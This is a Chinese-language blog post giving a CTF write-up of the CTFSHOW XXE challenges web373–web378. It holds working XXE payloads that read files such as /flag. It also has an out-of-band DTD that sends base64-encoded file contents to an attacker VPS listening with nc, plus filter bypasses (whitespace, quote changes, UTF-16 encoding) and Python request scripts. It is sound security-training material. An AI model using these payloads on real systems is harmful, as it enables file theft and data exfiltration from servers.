<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>CTFSHOW | XXE题解 web373 - web378 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights"><meta property="og:type" content="blog"><meta property="og:title" content="CTFSHOW | XXE题解 web373 - web378"><meta property="og:url" content="https://waynejoon.github.io/posts/ctfshow-xxe-web373-web378/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-07-24T10:42:23.000Z"><meta property="article:modified_time" content="2025-07-24T11:12:23.547Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="CTFSHOW"><meta property="article:tag" content="CTF练习"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/ctfshow-xxe-web373-web378/"},"headline":"CTFSHOW | XXE题解 web373 - web378","image":["https://oss.waynejoons.icu/picphoto/20250724134347443.png","https://oss.waynejoons.icu/picphoto/20250724140022120.png","https://oss.waynejoons.icu/picphoto/20250724141018573.png","https://oss.waynejoons.icu/picphoto/20250724142912722.png","https://oss.waynejoons.icu/picphoto/20250724143630436.png","https://oss.waynejoons.icu/picphoto/20250724143750217.png","https://oss.waynejoons.icu/picphoto/20250724143825410.png","https://oss.waynejoons.icu/picphoto/20250724154423355.png","https://oss.waynejoons.icu/picphoto/20250724160447113.png","https://oss.waynejoons.icu/picphoto/20250724160517559.png","https://oss.waynejoons.icu/picphoto/20250724160340485.png","https://oss.waynejoons.icu/picphoto/20250724160023562.png","https://oss.waynejoons.icu/picphoto/20250724160050518.png","https://oss.waynejoons.icu/picphoto/20250724161558421.png","https://oss.waynejoons.icu/picphoto/20250724164321245.png","https://oss.waynejoons.icu/picphoto/20250724165226913.png","https://oss.waynejoons.icu/picphoto/20250724165303767.png","https://oss.waynejoons.icu/picphoto/20250724165542892.png","https://oss.waynejoons.icu/picphoto/20250724171149199.png","https://oss.waynejoons.icu/picphoto/20250724171446705.png","https://oss.waynejoons.icu/picphoto/20250724180656298.png"],"datePublished":"2025-07-24T10:42:23.000Z","dateModified":"2025-07-24T11:12:23.547Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"CTFSHOW XXE专题详细题解"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/ctfshow-xxe-web373-web378/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-07-24T10:42:23.000Z" title="2025/7/24 18:42:23">2025-07-24</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/CTFSHOW/">CTFSHOW</a></span><span class="level-item">13 分钟读完 (大约1902个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">CTFSHOW | XXE题解 web373 - web378</h1><div class="content"><h2 id="什么是XML"><a href="#什么是XML" class="headerlink" title="什么是XML"></a>什么是XML</h2><p>XML，全称为可扩展标记语言（eXtensible Markup Language），设计宗旨是传输和存储数据</p>
<p>可以把它和HTML对比来理解：</p>
<ul>
<li><strong>HTML</strong> 的标签（如<code>&lt;h1&gt;</code>, <code>&lt;p&gt;</code>）是预定义好的，主要功能是告诉浏览器如何<strong>显示</strong>内容。</li>
<li><strong>XML</strong> 的标签则可以由开发者根据需求<strong>自己定义</strong>，用来清晰地描述数据的结构和含义。</li>
</ul>
<p>举个例子</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">to</span>&gt;</span>小明<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">from</span>&gt;</span>小红<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">heading</span>&gt;</span>提醒<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span>别忘了周五的会议！<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>为了更好地理解XXE，我们还需要了解XML中两个与漏洞密切相关的关键组件：<code>DOCTYPE</code> 和 <code>ENTITY</code></p>
<ul>
<li><strong>DOCTYPE (文档类型声明)</strong> ：它通常出现在XML文档的顶部，用于定义该文档的结构和规则。对于XXE漏洞来说，<code>DOCTYPE</code>最重要的作用是，它提供了一个可以定义实体（ENTITY）的地方</li>
<li><strong>ENTITY (实体)</strong> ：必须在<code>DOCTYPE</code>声明中定义，主要有两种：<ul>
<li><strong>内部实体</strong>：像一个简单的文本变量，方便在文档中复用。例如：<code>&lt;!ENTITY author &quot;Wayne&quot;&gt;</code>，之后在文档中使用的 <code>&amp;author;</code> 就会被替换为 “Wayne”</li>
<li><strong>外部实体</strong>：这是XXE漏洞的核心。它允许我们引用<strong>外部资源</strong>的内容，例如服务器上的一个文件或一个网址。例如：<code>&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;</code></li>
</ul>
</li>
</ul>
<h2 id="什么是XXE"><a href="#什么是XXE" class="headerlink" title="什么是XXE"></a>什么是XXE</h2><p>XXE全称是“XML外部实体注入”（XML External Entity Injection），当一个应用程序接收并解析了用户提交的XML数据，但其XML解析器配置不当时，就容易产生XXE漏洞</p>
<p>流程大概如下</p>
<ol>
<li>构造一个恶意的XML文档</li>
<li>在文档中定义一个指向服务器本地敏感文件的外部实体，例如： <code>&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;</code></li>
<li>在XML数据中引用这个实体 <code>&amp;xxe;</code></li>
<li>服务器在解析这段XML时，会查找并读取 <code>/etc/passwd</code> 文件的内容，并用它替换掉 <code>&amp;xxe;</code></li>
<li>最后，攻击者通过页面的回显（有回显XXE）或将数据发送到自己的服务器（无回显XXE）来窃取信息</li>
</ol>
<h2 id="题目列表"><a href="#题目列表" class="headerlink" title="题目列表"></a>题目列表</h2><h3 id="web373"><a href="#web373" class="headerlink" title="web373"></a>web373</h3><p>题目给了源码，我们可以分析一下</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724134347443.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="comment">//允许加载外部实体，在PHP 8.0及以上版本，此项默认为true。</span></span><br><span class="line"><span class="title function_ invoke__">libxml_disable_entity_loader</span>(<span class="literal">false</span>);</span><br><span class="line"><span class="comment">//从HTTP请求的body中读取原始数据，一般是POST请求的内容。</span></span><br><span class="line"><span class="variable">$xmlfile</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://input&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$xmlfile</span>))&#123;</span><br><span class="line">	<span class="comment">//新建一个DOMDocument对象，用于处理XML。</span></span><br><span class="line">    <span class="variable">$dom</span> = <span class="keyword">new</span> <span class="title class_">DOMDocument</span>();</span><br><span class="line">    <span class="comment">//LIBXML_NOENT: 替换XML文档中的实体；LIBXML_DTDLOAD: 允许加载外部DTD。</span></span><br><span class="line">    <span class="variable">$dom</span>-&gt;<span class="title function_ invoke__">loadXML</span>(<span class="variable">$xmlfile</span>, LIBXML_NOENT | LIBXML_DTDLOAD);</span><br><span class="line">    <span class="comment">//把DOM对象转换为PHP对象。</span></span><br><span class="line">    <span class="variable">$creds</span> = <span class="title function_ invoke__">simplexml_import_dom</span>(<span class="variable">$dom</span>);</span><br><span class="line">    <span class="variable">$ctfshow</span> = <span class="variable">$creds</span>-&gt;ctfshow;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$ctfshow</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);   </span><br></pre></td></tr></table></figure>

<p>由源码可知，这是个<strong>有回显</strong>的XXE，因此直接POST注入即可</p>
<p>payload：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">test</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///flag&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 对应源码的$ctfshow = $creds-&gt;ctfshow; --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">creds</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">ctfshow</span>&gt;</span><span class="symbol">&amp;xxe;</span><span class="tag">&lt;/<span class="name">ctfshow</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">creds</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724140022120.png"></p>
<h3 id="web374"><a href="#web374" class="headerlink" title="web374"></a>web374</h3><p>分析源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724141018573.png"></p>
<p>相比上一题，这一题少了回显代码，也就是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$creds</span> = <span class="title function_ invoke__">simplexml_import_dom</span>(<span class="variable">$dom</span>);</span><br><span class="line"><span class="variable">$ctfshow</span> = <span class="variable">$creds</span>-&gt;ctfshow;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$ctfshow</span>;</span><br></pre></td></tr></table></figure>

<p>因此这是个<strong>无回显</strong>的XXE，需要用到vps进行数据外带显示</p>
<p>payload：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">test</span> [<span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://vps地址/test.dtd&quot;</span>&gt;</span>%xxe;]&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后在vps的<strong>网站根目录</strong>创建test.dtd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;</span><br><span class="line">&lt;!-- “&amp;#x25;”是 % 的意思,因为是嵌套引用，所以不能直接写% --&gt;</span><br><span class="line">&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; out SYSTEM &#x27;http://vps地址:1234/?x=%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%eval;</span><br><span class="line">%out;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724142912722.png"></p>
<p>保存文件并退出Vim：按下ESC进入命令模式，然后输入<code>:wq</code>并按回车键</p>
<p>最后在服务器用nc监听1234端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 1234</span><br></pre></td></tr></table></figure>

<p>接着发送POST请求</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724143630436.png"></p>
<p>重新回到vps查看加密内容，然后base64解码即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724143750217.png"></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724143825410.png"></p>
<p>我们来分析一下思路，简单来说就是初始Payload调用了外部DTD，外部DTD中先用一个实体<code>%eval;</code>去<strong>定义</strong>另一个能发送数据的实体<code>%out;</code>，然后再<strong>调用</strong>这个新实体将文件内容外带出来</p>
<p>那为什么要这样子套娃，直接调用不可以吗</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;</span><br><span class="line">&lt;!ENTITY % out SYSTEM &quot;http://vps地址:1234/?x=%file;&quot;&gt;  %out;</span><br></pre></td></tr></table></figure>

<p>如果直接调用，上面第二步中的 <code>&lt;!ENTITY % out ...&gt;</code> 会直接导致XML解析器报错。因为在解析器看来，<code>%file;</code> 这个<strong>引用</strong>被用在了另一个实体 <code>out</code> 的<strong>定义字符串</strong>里，这是不被允许的</p>
<p>因此我们需要嵌套使用，用外部实体<code>%eval;</code>把内层命令伪装成一个字符串，当外部实体被调用后，此时<code>%file;</code> 实体已经被定义过了，最后再调用<code>%out;</code>，就可以成功执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;</span><br><span class="line">&lt;!-- “&amp;#x25;”是 % 的意思,因为是嵌套引用，所以不能直接写% --&gt;</span><br><span class="line">&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; out SYSTEM &#x27;http://vps地址:1234/?x=%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%eval;</span><br><span class="line">%out;</span><br></pre></td></tr></table></figure>

<h3 id="web375"><a href="#web375" class="headerlink" title="web375"></a>web375</h3><p>先看看源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724154423355.png"></p>
<p>跟上一题差不多，不过这次多了一个过滤条件，由于它是匹配整一个语句<code>&lt;?xml version=&quot;1.0&quot;</code>，因此有很多方法绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/&lt;\?xml version=&quot;1\.0&quot;/&#x27;</span>, <span class="variable">$xmlfile</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>方法一：</p>
<p>在xml和version中加一个空格</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml  version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">test</span> [<span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://vps地址/test.dtd&quot;</span>&gt;</span>%xxe;]&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724160447113.png"></p>
<p>方法二：</p>
<p>直接把<code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</code>去掉</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">test</span> [<span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://vps地址/test.dtd&quot;</span>&gt;</span>%xxe;]&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724160517559.png"></p>
<p>方法三：</p>
<p>把双引号改成单引号，即<code>&lt;?xml version=&#39;1.0&#39; encoding=&quot;UTF-8&quot;?&gt;</code></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&#x27;1.0&#x27; encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">test</span> [<span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://vps地址/test.dtd&quot;</span>&gt;</span>%xxe;]&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724160340485.png"></p>
<p>随便选一种方法做即可，其他步骤跟上一题一样，成功得到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724160023562.png"></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724160050518.png"></p>
<h3 id="web376"><a href="#web376" class="headerlink" title="web376"></a>web376</h3><p>先看源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724161558421.png"></p>
<p>相比上一题，这题的过滤条件多了一个检测大小写功能，但是不影响做题，可以用上一题的方法</p>
<h3 id="web377"><a href="#web377" class="headerlink" title="web377"></a>web377</h3><p>分析源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724164321245.png"></p>
<p>这次多了一个http的过滤，可以用编码绕过，xml不仅支持UTF-8编码，也支持UTF-16、UTF-32和EBCDIC编码</p>
<p>因此我们在web375绕过<code>&lt;?xml version=&quot;1.0&quot;</code>的基础上，加一个编码转换即可，用python脚本完成</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://48e31982-9b66-42aa-b386-f34f7b7f8d36.challenge.ctf.show/&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;&quot;&quot;&lt;?xml  version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span></span><br><span class="line"><span class="string">&lt;!DOCTYPE test [&lt;!ENTITY % xxe SYSTEM &quot;http://vps地址/test.dtd&quot;&gt;%xxe;]&gt;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">payload = payload.encode(<span class="string">&#x27;utf-16&#x27;</span>)</span><br><span class="line">response = requests.post(url, data=payload)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br></pre></td></tr></table></figure>

<p>先在vps监听端口，然后运行脚本</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724165226913.png"></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724165303767.png"></p>
<h3 id="web378"><a href="#web378" class="headerlink" title="web378"></a>web378</h3><p>打开题目看到一个登录框</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724165542892.png"></p>
<p><code>ctrl+u</code>查看网页源码，可以判断存在XXE漏洞</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724171149199.png"></p>
<p>在登录框页面随便输入个账号密码，可以看到有回显，因此是属于<strong>有回显</strong>的XXE</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250724171446705.png"></p>
<p>因此我们可以构造XML payload，然后POST发送到&#x2F;doLogin即可，这里用python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://39e1f8ce-fd5e-483d-a620-38d00350bff3.challenge.ctf.show/doLogin&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;&quot;&quot;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span></span><br><span class="line"><span class="string">&lt;!DOCTYPE test [</span></span><br><span class="line"><span class="string">&lt;!ENTITY xxe SYSTEM &quot;file:///flag&quot;&gt;</span></span><br><span class="line"><span class="string">]&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;user&gt;&lt;username&gt;&amp;xxe;&lt;/username&gt;&lt;password&gt;&amp;xxe;&lt;/password&gt;&lt;/user&gt;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">response = requests.post(url, data=payload)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250724180656298.png"></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>CTFSHOW | XXE题解 web373 - web378</p><p><a href="https://waynejoon.github.io/posts/ctfshow-xxe-web373-web378/">https://waynejoon.github.io/posts/ctfshow-xxe-web373-web378/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-07-24</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/CTFSHOW/">CTFSHOW, </a><a class="link-muted" rel="tag" href="/tags/CTF%E7%BB%83%E4%B9%A0/">CTF练习 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/ctfshow-black-box-web380-web395/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTFSHOW | 黑盒测试 web380 - web395</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/frp-deployment-tutorial/"><span class="level-item">工具推荐 | 内网穿透神器FRP部署教程</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">12</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">3</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#什么是XML"><span class="level-left"><span class="level-item">1</span><span class="level-item">什么是XML</span></span></a></li><li><a class="level is-mobile" href="#什么是XXE"><span class="level-left"><span class="level-item">2</span><span class="level-item">什么是XXE</span></span></a></li><li><a class="level is-mobile" href="#题目列表"><span class="level-left"><span class="level-item">3</span><span class="level-item">题目列表</span></span></a><ul 